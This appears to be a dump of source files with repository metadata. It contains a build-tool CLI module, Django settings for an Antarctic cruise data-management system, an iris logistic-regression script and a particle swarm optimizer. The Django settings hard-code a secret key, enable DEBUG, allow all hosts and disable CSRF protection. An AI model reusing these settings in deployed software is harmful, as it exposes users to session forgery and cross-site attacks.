    either one path per line or (with --long) as a path/filetype/exists table."""
    remake = load_remake(remakefile)
    filelist = remake.list_files(filetype, exists,
                                 produced_by_rule, used_by_rule, produced_by_task, used_by_task)
    if not long:
        for entry in filelist:
            print(entry[0])
        return
    print(tabulate(filelist, headers=('path', 'filetype', 'exists')))
def rm_files(remakefile, force, filetype,
             produced_by_rule, used_by_rule, produced_by_task, used_by_task):
    """Implement the ``rm-files`` sub-command: delete matching files from disk.

    Prompts once before deleting anything, and (unless ``force``) once more per
    input-only file, since those cannot be regenerated by running tasks.
    """
    remake = load_remake(remakefile)
    # Second arg True: only list files that actually exist.
    filelist = remake.list_files(filetype, True, produced_by_rule, used_by_rule,
                                 produced_by_task, used_by_task)
    if not filelist:
        logger.info('No files to delete')
        return
    if force:
        r = 'yes'
    else:
        r = input(bcolors.BOLD + bcolors.WARNING +
                  f'This will delete {len(filelist)} files, do you want to proceed? (yes/[no]): ' +
                  bcolors.ENDC)
    if r != 'yes':
        print('Not deleting files (yes not entered)')
        return
    for file, ftype, exists in filelist:
        if ftype == 'input-only':
            if force:
                r = 'yes'
            else:
                r = input(bcolors.BOLD + bcolors.FAIL +
                          f'Are you sure you want to delete input-only file: {file}? (yes/[no]): ' +
                          bcolors.ENDC)
                if r != 'yes':
                    print('Not deleting files (yes not entered)')
                    continue
        logger.info(f'Deleting file: {file}')
        file.unlink()
def remakefile_info(remakefile, short, long, display):
    """Implement the ``info`` sub-command: show remakefile status as text
    (``print_status``) or as a task DAG display (``task_dag``)."""
    if display == 'print_status':
        remake = load_remake(remakefile).finalize()
        if short:
            remake.short_status(mode='print')
        else:
            remake.tasks.status(long, long)
    elif display == 'task_dag':
        remake = load_remake(remakefile).finalize()
        remake.display_task_dag()
    else:
        raise Exception(f'Unrecognized display: {display}')
def rule_info(remakefile, long, rule_names):
    """Implement the ``rule-info`` sub-command: print each requested rule,
    logging an error for any name not found in the remakefile."""
    remake = load_remake(remakefile).finalize()
    rules = remake.list_rules()
    for rule_name in rule_names:
        # for/else: the else branch runs only when no rule matched.
        for rule in rules:
            if rule.__name__ == rule_name:
                print(rule)
                break
        else:
            logger.error(f'No rule {rule_name} in {remake.name} found')
def task_info(remakefile, long, task_path_hash_keys):
    """Implement the ``task-info`` sub-command: print status and rerun state
    for each requested task; with ``long``, also its input/output files."""
    remake = load_remake(remakefile).finalize()
    info = remake.task_info(task_path_hash_keys)
    for task_path_hash_key, (task, task_md, status) in info.items():
        print(str(task))
        print(status)
        print(task_md.task_requires_rerun())
        if long:
            print('Uses files:')
            for key, path in task.inputs.items():
                print(f'  {key}: {path}')
            print('Produces files:')
            for key, path in task.outputs.items():
                print(f'  {key}: {path}')
def file_info(remakefile, filenames):
    """Implement the ``file-info`` sub-command: for each path show existence,
    the producing task, consuming tasks, and whether its recorded metadata
    has changed since last use."""
    remake = load_remake(remakefile).finalize()
    info = remake.file_info(filenames)
    for path, (path_md, produced_by_task, used_by_tasks) in info.items():
        if path.exists():
            print(f'exists: {path}')
        else:
            print(f'does not exist: {path}')
        if not path_md:
            # Path is unknown to this remakefile; nothing more to report.
            print(f'Path not found in {remake.name}')
            print()
            continue
        if produced_by_task:
            print('Produced by:')
            print('  ' + str(produced_by_task))
        if used_by_tasks:
            print('Used by:')
            for task in used_by_tasks:
                print('  ' + str(task))
        if path.exists():
            metadata_has_changed = path_md.compare_path_with_previous()
            if metadata_has_changed:
                print('Path metadata has changed since last use')
            else:
                print('Path metadata unchanged')
        print()
def monitor(remakefile, timeout):
    """Implement the ``monitor`` sub-command: run the curses monitor UI,
    polling the remake metadata every ``timeout`` seconds."""
    # Imported here so curses is only required when monitoring.
    from curses import wrapper
    remake = load_remake(remakefile)
    remake.task_ctrl.build_task_DAG()
    wrapper(remake_curses_monitor, remake, timeout)
def setup_examples(force):
    """Implement the ``setup-examples`` sub-command: copy the bundled example
    scripts and data from the installed remake package into a local directory
    (default ``remake-examples``), prompting before overwriting unless
    ``force`` is set."""
    import remake
    logger.debug('Setting up examples')
    new_examples_dir = 'remake-examples'
    if not force:
        r = input(f'Directory name [{new_examples_dir}]: ')
        if r:
            new_examples_dir = r
    new_examples_dir = Path(new_examples_dir)
    if new_examples_dir.exists():
        if not force:
            r = input(f'Overwrite examples in {new_examples_dir} y/[n]: ')
            if r != 'y':
                print('Exiting')
                return
        logger.debug(f'rm {new_examples_dir}')
        shutil.rmtree(new_examples_dir)
    new_examples_dir.mkdir(parents=True, exist_ok=True)
    # Locate the examples shipped inside the installed package.
    remake_dir = Path(remake.__file__).parent
    examples_dir = remake_dir / 'examples'
    cp_paths = sorted(examples_dir.glob('ex?.py'))
    cp_paths.append(examples_dir / 'demo.py')
    cp_paths.append(examples_dir / 'ex_slurm.py')
    cp_paths.append(examples_dir / 'README.md')
    cp_paths.append(examples_dir / 'Makefile')
    for path in cp_paths:
        new_path = new_examples_dir / path.name
        logger.info(f'Copy {path} -> {new_path}')
        shutil.copy(path, new_path)
    data_dir = examples_dir / 'data'
    new_data_dir = new_examples_dir / 'data'
    logger.info(f'Copy {data_dir} -> {new_data_dir}')
    shutil.copytree(data_dir, new_data_dir)
| 13,760 | 5,857 | 647 |
970a8fe9118aca227d5ddecdd61006a20022478a | 9,539 | py | Python | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 6 | 2017-10-06T09:18:04.000Z | 2022-02-10T08:54:56.000Z | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 12 | 2020-02-27T09:24:50.000Z | 2021-09-22T17:39:55.000Z | ScienceCruiseDataManagement/ScienceCruiseDataManagement/settings.py | Swiss-Polar-Institute/science-cruise-data-management | 67721a0f4a1255b8ac43e530ed95a8c324239c7c | [
"MIT"
] | 1 | 2017-10-16T13:49:33.000Z | 2017-10-16T13:49:33.000Z | """
Django settings for ScienceCruiseDataManagement project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import datetime
import pathlib
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*gb+gevd#dx0euc(#$4ts!37w%9m#kbjlz_4k9@&62ok+=w_*2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# INTERNAL_IPS = ["127.0.0.1",]
INTERNAL_IPS = [] # Used by the Debugger console. The maps/some pages might not work
# offline because the debugger tries to load an external JQurey
# NOTE: by default this is an empty list. Check documentation.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'import_export', # to export as CSV
'debug_toolbar',
'django_extensions',
'selectable', # auto-completion
'smart_selects', # foreign keys depending on other foreign keys
'ship_data',
'data_storage_management',
'main', # ScienceCruiseManagement main app
'metadata',
'ctd',
'underway_sampling',
'data_administration',
'expedition_reporting',
'spi_admin',
'data_management'
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware', TODO: reenable, test data_storage_management/views.py and the script
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ScienceCruiseDataManagement.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'main', 'templates'), os.path.join(BASE_DIR, 'metadata', 'templates'), os.path.join(BASE_DIR, 'expedition_reporting', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ScienceCruiseDataManagement.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# This project could just use sqlite3 for testing purposes. Then
# the DATABASES dictionary would be like:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
#
def secrets_file(file_name):
    """Return the path of a secrets/config file.

    Looks for ``$HOME/.<file_name>`` first, then ``/run/secrets/<file_name>``
    (Docker-secrets style location).

    Raises:
        FileNotFoundError: if the file exists in neither location.
    """
    file_path_in_home_directory = os.path.join(str(pathlib.Path.home()), "." + file_name)
    if os.path.exists(file_path_in_home_directory):
        return file_path_in_home_directory
    file_path_in_run_secrets = os.path.join("/run/secrets", file_name)
    if os.path.exists(file_path_in_run_secrets):
        return file_path_in_run_secrets
    # Bug fix: `raise "<str>"` is a TypeError in Python 3 (exceptions must
    # derive from BaseException); raise a proper exception instead.
    raise FileNotFoundError("Configuration for {} doesn't exist".format(file_name))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'OPTIONS': {
'read_default_file': secrets_file("science_cruise_data_management_mysql.conf"),
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
# So DATETIME_FORMAT is honored
USE_L10N = False
USE_TZ = True
# Datetime in list views in YYYY-MM-DD HH:mm::ss
DATETIME_FORMAT = "Y-m-d H:i:s"
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Should be moved out from here, just for development at the moment
BASE_STORAGE_DIRECTORY = '/mnt/ace_data'
# Added for the importer-exporter module
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
# Users that can add events should be in this Group (it's created by the command createdjangousers
ADD_EVENTS_GROUP = "Add events"
# Controlled vocabulary sources
VOCAB_SOURCES = (("seadatanet", "Sea Data Net"),
("seavox", "SeaVoX"),
("globalchangemasterdirectory", "Global Change Master Directory"),
("generatedforace", "Generated for ACE"),
("britishoceanographicdatacentre", "British Oceanographic Data Centre (BODC)"))
DEVICE_SOURCE_DEFAULT= "generatedforace"
UNCERTAINTY_DEFAULT = "britishoceanoraphicdatacentre"
VALIDITY_OPTIONS = (("valid", "valid"), ("redundant", "redundant"))
# JQUERY is loaded when necessary from the static files
USE_DJANGO_JQUERY = False
JQUERY_URL = '/static/js/external/jquery-1.12.0.min.js'
ADMIN_SITE_TITLE = 'ACE Data Admin'
ADMIN_SITE_HEADER = 'ACE Data Administration'
# This can be a symbolik link
DOCUMENTS_DIRECTORY = os.path.join(os.getenv("HOME"), "intranet_documents")
FORECAST_DIRECTORY = os.path.join(os.getenv("HOME"), "ethz_forecast_data")
MAIN_GPS = "GLONASS"
NAS_STAGING_MOUNT_POINT = "/mnt/ace_data"
NAS_IP = "192.168.20.2"
UPDATE_LOCATION_STATIONS_TYPES = ["marine"]
UPDATE_LOCATION_POSITION_UNCERTAINTY_NAME = "0.0 to 0.01 n.miles"
UPDATE_LOCATION_POSITION_SOURCE_NAME = "Ship's GPS"
# The following Event Action types will not be updated
UPDATE_LOCATION_POSITION_EXCEPTION_EVENT_ACTION_TYPE_ENDS_EXCEPTIONS = ["Sonobuoy"]
MAP_RESOLUTION_SECONDS = 1800
TRACK_MAP_FILEPATH = "/home/jen/projects/ace_data_management/data_requests/20171106_walton_distance_travelled/geojson_track/geojson.track"
IMAGE_RELOAD_FILEPATH = "/mnt/data_admin/latest_image/latest_image.jpg"
# For default options
DEFAULT_PLATFORM_NAME = "Akademik Treshnikov"
DEFAULT_MISSION_NAME = "Antarctic Circumnavigation Expedition"
DEFAULT_CTD_OPERATOR_FIRSTNAME = "Marie-Noelle"
DEFAULT_CTD_OPERATOR_LASTNAME = "Houssais"
# NOTE(review): `expedition_sample_code` is not defined anywhere above in this
# module, so importing settings raises NameError on the next line unless the
# name is injected some other way (local_settings is only imported further
# down, after this point) -- confirm where this value is meant to come from.
EXPEDITION_SAMPLE_CODE = expedition_sample_code
MAXIMUM_EMAIL_SIZE = 435000  # bytes
# IMAP_SERVER = "192.168.20.40"
IMAP_SERVER = "46.226.111.64"
# DEFAULT VALUES FOR METADATA MODEL
DEFAULT_IN_GCMD = True
DEFAULT_IN_DATACITE = True
DEFAULT_METADATA_NAME = "CEOS IDN DIF"
DEFAULT_METADATA_VERSION = "VERSION 9.9"
DEFAULT_DATA_SET_LANGUAGE = "English"
METADATA_DEFAULT_PLATFORM_SHORT_NAME = ["R/V AT"]
METADATA_DEFAULT_PROJECT_SHORT_NAME = ["SPI-ACE"]
METADATA_DEFAULT_DATA_CENTER = ["SPI"]
METADATA_DEFAULT_IDN_NODE = ["AMD", "SOOS"]
METADATA_DEFAULT_CITATION_PUBLISHER = "SPI"
DATE_TWO_DAYS = datetime.datetime(2017, 2, 5)
try:
from local_settings import *
print('Imported local_settings')
except ImportError:
pass
| 33.470175 | 172 | 0.73037 | """
Django settings for ScienceCruiseDataManagement project.
Generated by 'django-admin startproject' using Django 1.10.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import datetime
import pathlib
# This file is part of https://github.com/cpina/science-cruise-data-management
#
# This project was programmed in a hurry without any prior Django experience,
# while circumnavigating the Antarctic on the ACE expedition, without proper
# Internet access, with 150 scientists using the system and doing at the same
# cruise other data management and system administration tasks.
#
# Sadly there aren't unit tests and we didn't have time to refactor the code
# during the cruise, which is really needed.
#
# Carles Pina (carles@pina.cat) and Jen Thomas (jenny_t152@yahoo.co.uk), 2016-2017.
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*gb+gevd#dx0euc(#$4ts!37w%9m#kbjlz_4k9@&62ok+=w_*2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# INTERNAL_IPS = ["127.0.0.1",]
INTERNAL_IPS = [] # Used by the Debugger console. The maps/some pages might not work
# offline because the debugger tries to load an external JQurey
# NOTE: by default this is an empty list. Check documentation.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'import_export', # to export as CSV
'debug_toolbar',
'django_extensions',
'selectable', # auto-completion
'smart_selects', # foreign keys depending on other foreign keys
'ship_data',
'data_storage_management',
'main', # ScienceCruiseManagement main app
'metadata',
'ctd',
'underway_sampling',
'data_administration',
'expedition_reporting',
'spi_admin',
'data_management'
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware', TODO: reenable, test data_storage_management/views.py and the script
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ScienceCruiseDataManagement.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'main', 'templates'), os.path.join(BASE_DIR, 'metadata', 'templates'), os.path.join(BASE_DIR, 'expedition_reporting', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ScienceCruiseDataManagement.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# This project could just use sqlite3 for testing purposes. Then
# the DATABASES dictionary would be like:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
#
def secrets_file(file_name):
    """Return the path of an existing secrets/configuration file.

    Looks first for ``$HOME/.<file_name>``, then for
    ``/run/secrets/<file_name>`` (Docker secrets convention).

    Args:
        file_name: base name of the secrets file (without the leading dot).

    Returns:
        The first existing candidate path.

    Raises:
        FileNotFoundError: if the file exists in neither location.
    """
    file_path_in_home_directory = os.path.join(str(pathlib.Path.home()), "." + file_name)
    if os.path.exists(file_path_in_home_directory):
        return file_path_in_home_directory
    file_path_in_run_secrets = os.path.join("/run/secrets", file_name)
    if os.path.exists(file_path_in_run_secrets):
        return file_path_in_run_secrets
    # Bug fix: the original `raise "..."` raised a string, which in Python 3
    # produces "TypeError: exceptions must derive from BaseException" instead
    # of the intended message. Raise a proper exception type instead.
    raise FileNotFoundError("Configuration for {} doesn't exist".format(file_name))
# MySQL database; credentials are kept out of the repository and read from
# the file located by secrets_file() (home directory or /run/secrets).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'OPTIONS': {
            'read_default_file': secrets_file("science_cruise_data_management_mysql.conf"),
            # Strict mode: reject invalid/out-of-range values instead of
            # silently truncating them on insert/update.
            'init_command': "SET sql_mode='STRICT_TRANS_TABLES'"
        },
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
# So DATETIME_FORMAT is honored (L10N would override the format below)
USE_L10N = False
USE_TZ = True
# Datetime in list views in YYYY-MM-DD HH:mm:ss
DATETIME_FORMAT = "Y-m-d H:i:s"
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Should be moved out from here, just for development at the moment
BASE_STORAGE_DIRECTORY = '/mnt/ace_data'
# Added for the importer-exporter module
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
# Users that can add events should be in this Group (it's created by the
# command createdjangousers)
ADD_EVENTS_GROUP = "Add events"
# Controlled vocabulary sources: (key, human-readable name) pairs.
VOCAB_SOURCES = (("seadatanet", "Sea Data Net"),
                 ("seavox", "SeaVoX"),
                 ("globalchangemasterdirectory", "Global Change Master Directory"),
                 ("generatedforace", "Generated for ACE"),
                 ("britishoceanographicdatacentre", "British Oceanographic Data Centre (BODC)"))
# Default vocabulary source keys; both must be valid VOCAB_SOURCES keys.
DEVICE_SOURCE_DEFAULT = "generatedforace"
# Bug fix: was the misspelled "britishoceanoraphicdatacentre", which matched
# no key in VOCAB_SOURCES above.
UNCERTAINTY_DEFAULT = "britishoceanographicdatacentre"
VALIDITY_OPTIONS = (("valid", "valid"), ("redundant", "redundant"))
# JQUERY is loaded when necessary from the static files
USE_DJANGO_JQUERY = False
JQUERY_URL = '/static/js/external/jquery-1.12.0.min.js'
ADMIN_SITE_TITLE = 'ACE Data Admin'
ADMIN_SITE_HEADER = 'ACE Data Administration'
# These can be symbolic links. os.path.expanduser("~") is used instead of
# os.getenv("HOME") so this also works when $HOME is unset (os.getenv would
# return None and os.path.join would raise a TypeError at import time).
DOCUMENTS_DIRECTORY = os.path.join(os.path.expanduser("~"), "intranet_documents")
FORECAST_DIRECTORY = os.path.join(os.path.expanduser("~"), "ethz_forecast_data")
MAIN_GPS = "GLONASS"
NAS_STAGING_MOUNT_POINT = "/mnt/ace_data"
NAS_IP = "192.168.20.2"
UPDATE_LOCATION_STATIONS_TYPES = ["marine"]
UPDATE_LOCATION_POSITION_UNCERTAINTY_NAME = "0.0 to 0.01 n.miles"
UPDATE_LOCATION_POSITION_SOURCE_NAME = "Ship's GPS"
# The following Event Action types will not be updated
UPDATE_LOCATION_POSITION_EXCEPTION_EVENT_ACTION_TYPE_ENDS_EXCEPTIONS = ["Sonobuoy"]
MAP_RESOLUTION_SECONDS = 1800
TRACK_MAP_FILEPATH = "/home/jen/projects/ace_data_management/data_requests/20171106_walton_distance_travelled/geojson_track/geojson.track"
IMAGE_RELOAD_FILEPATH = "/mnt/data_admin/latest_image/latest_image.jpg"
# For default options
DEFAULT_PLATFORM_NAME = "Akademik Treshnikov"
DEFAULT_MISSION_NAME = "Antarctic Circumnavigation Expedition"
DEFAULT_CTD_OPERATOR_FIRSTNAME = "Marie-Noelle"
DEFAULT_CTD_OPERATOR_LASTNAME = "Houssais"
def expedition_sample_code(sample):
    """Build the expedition-wide sample code string for *sample*.

    The code joins ship / cruise / leg / project / julian day / event /
    owner / sample id with slashes; the julian day is zero-padded to
    three digits.
    """
    return "{}/{}/{}/{}/{:03}/{}/{}/{}".format(
        sample.ship.shortened_name,
        sample.mission.acronym,
        sample.leg.number,
        sample.project.number,
        sample.julian_day,
        sample.event.number,
        sample.pi_initials.initials,
        sample.id,
    )
# Callable used elsewhere in the project to render a sample's code string.
EXPEDITION_SAMPLE_CODE = expedition_sample_code
MAXIMUM_EMAIL_SIZE = 435000 # bytes
# IMAP_SERVER = "192.168.20.40"
IMAP_SERVER = "46.226.111.64"
# DEFAULT VALUES FOR METADATA MODEL
DEFAULT_IN_GCMD = True
DEFAULT_IN_DATACITE = True
DEFAULT_METADATA_NAME = "CEOS IDN DIF"
DEFAULT_METADATA_VERSION = "VERSION 9.9"
DEFAULT_DATA_SET_LANGUAGE = "English"
METADATA_DEFAULT_PLATFORM_SHORT_NAME = ["R/V AT"]
METADATA_DEFAULT_PROJECT_SHORT_NAME = ["SPI-ACE"]
METADATA_DEFAULT_DATA_CENTER = ["SPI"]
METADATA_DEFAULT_IDN_NODE = ["AMD", "SOOS"]
METADATA_DEFAULT_CITATION_PUBLISHER = "SPI"
DATE_TWO_DAYS = datetime.datetime(2017, 2, 5)
# Optional per-deployment overrides: if a local_settings module is on the
# path it may redefine any of the settings above; its absence is not an error.
try:
    from local_settings import *
    print('Imported local_settings')
except ImportError:
    pass
| 779 | 0 | 23 |
37da04a97535250d818772393ad249af4c7febea | 70 | py | Python | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | views/__init__.py | bkosciow/piader | 81ca2c8a4bd4a834fb460b5306fca0c5ce0584c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" Views
"""
__author__ = 'Bartosz Kościów'
| 11.666667 | 30 | 0.557143 | # -*- coding: utf-8 -*-
""" Views
"""
__author__ = 'Bartosz Kościów'
| 0 | 0 | 0 |
7655b0892a69e9fd5d785d3cebb5a5bf32252527 | 886 | py | Python | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | IRIS- Logistic Regression.py | aayushi-droid/KNN-Machine-Learning-Algorithm | 5bd71c1a3c53decf497c7c76eaa556eecfacf29c | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
# Load The Data Into DataFrame with Pandas
iris = load_iris()
X = pd.DataFrame(iris.data) # Independent Variable
y = pd.DataFrame(iris.target) # Dependent Variable
#print(X.head()) # print 5 rows of independent variable
#Label Encoder
encode = LabelEncoder()
y = encode.fit_transform(y)
# convert into train and test data
trainX,testX,trainy, testy = train_test_split(X, y, test_size= 0.2)
# fit and predict model
model = LogisticRegression().fit(trainX,trainy)
predy = model.predict(testX)
# check accuracy score
score = accuracy_score(testy, predy)
print(f'Accuracy Score : {score}')
| 29.533333 | 68 | 0.755079 | import pandas as pd
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import accuracy_score
from sklearn.linear_model import LogisticRegression
# Load The Data Into DataFrame with Pandas
iris = load_iris()
X = pd.DataFrame(iris.data) # Independent Variable
y = pd.DataFrame(iris.target) # Dependent Variable
#print(X.head()) # print 5 rows of independent variable
#Label Encoder
encode = LabelEncoder()
# NOTE(review): y is a single-column DataFrame here; LabelEncoder expects a
# 1-D array and sklearn may emit a DataConversionWarning — consider
# y.values.ravel(). Confirm against the sklearn version in use.
y = encode.fit_transform(y)
# convert into train and test data (80% train / 20% test)
trainX,testX,trainy, testy = train_test_split(X, y, test_size= 0.2)
# fit and predict model
model = LogisticRegression().fit(trainX,trainy)
predy = model.predict(testX)
# check accuracy score
score = accuracy_score(testy, predy)
print(f'Accuracy Score : {score}')
| 0 | 0 | 0 |
649428646af304c32b3dae64d4cf321c4cf12be2 | 4,140 | py | Python | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | null | null | null | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | 1 | 2021-06-02T10:07:26.000Z | 2021-06-03T10:23:46.000Z | nonlinear_data_fitting/particle_swam_optimization_algorithm.py | almostdutch/numerical-optimization-algorithms | cd6c1306cb04eccce62a74420323bda83058c1d6 | [
"MIT"
] | null | null | null | """
particle_swam_optimization_algorithm.py
Returns the minimizer of the function
func_ps - anonimous function (vectorized for multiple particles)
"""
import numpy as np
import numpy.matlib
np.random.seed();
| 42.244898 | 135 | 0.624638 | """
particle_swam_optimization_algorithm.py
Returns the minimizer of the function
func_ps - anonimous function (vectorized for multiple particles)
"""
import numpy as np
import numpy.matlib
np.random.seed();
def particle_swam_optimization_algorithm(func_ps, options):
    """Minimize a vectorized objective with particle swarm optimization.

    Args:
        func_ps: callable mapping an (N_ps, dim) array of particle positions
            to an (N_ps, 1) array of objective values (vectorized over
            particles).
        options: dict with keys 'N_ps', 'N_iter_max', 'tolerance_x',
            'tolerance_y', 'x_lower', 'x_upper' (column vectors, transposed
            below), 'd_lower', 'd_upper', 'alpha', 'w', 'c1', 'c2'.

    Returns:
        (X_best, report): the best position found as a (dim, 1) column
        vector, and a dict with the iteration history.
    """
    report = {};
    N_ps = options['N_ps']; # number of particles
    N_iter_max = options['N_iter_max'];
    tolerance_x = options['tolerance_x'];
    tolerance_y = options['tolerance_y'];
    # Bounds are supplied as column vectors; transpose to row vectors and
    # tile one row per particle for elementwise clamping below.
    X_lower = options['x_lower'].T;
    ps_X_lower = np.matlib.repmat(X_lower, N_ps, 1);
    X_upper = options['x_upper'].T;
    ps_X_upper = np.matlib.repmat(X_upper, N_ps, 1);
    d_lower = options['d_lower'];
    d_upper = options['d_upper'];
    X0 = X_lower + (X_upper - X_lower) * np.random.rand(N_ps, X_lower.size); # initial positions of all particles
    d = d_lower + (d_upper - d_lower) * np.random.rand(N_ps, X_lower.size); # initial directions (aka velocities) of all particles
    alpha = options['alpha']; # step size
    w = options['w'];
    c1 = options['c1'];
    c2 = options['c2'];
    progress_x_ps = np.zeros((N_iter_max + 1, N_ps, X_lower.size)); # vector of positions of all particles
    progress_y_ps = np.zeros((N_iter_max + 1, N_ps, 1));
    progress_x = np.zeros((N_iter_max + 1, X_lower.size)); # vector of global best positions
    progress_y = np.zeros((N_iter_max + 1, 1));
